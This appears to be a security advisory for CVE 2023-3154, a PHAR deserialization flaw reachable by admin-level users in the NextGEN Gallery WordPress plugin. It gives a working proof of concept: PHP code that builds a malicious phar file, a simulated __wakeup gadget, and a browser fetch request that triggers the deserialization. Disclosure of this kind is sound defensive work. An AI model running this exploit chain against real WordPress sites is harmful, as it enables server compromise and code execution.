NextGEN Gallery < 3.39 – Admin+ PHAR Deserialization | CVE 2023-3154

Description

The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the `gallery_edit` function, allowing an attacker to access arbitrary resources on the server.

Proof of Concept

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

<?php

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


4. Add the following code to the server to simulate a gadget:

class Evil {
	function __wakeup() {
		die('Arbitrary deserialization');
	}
}


5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"
})).text();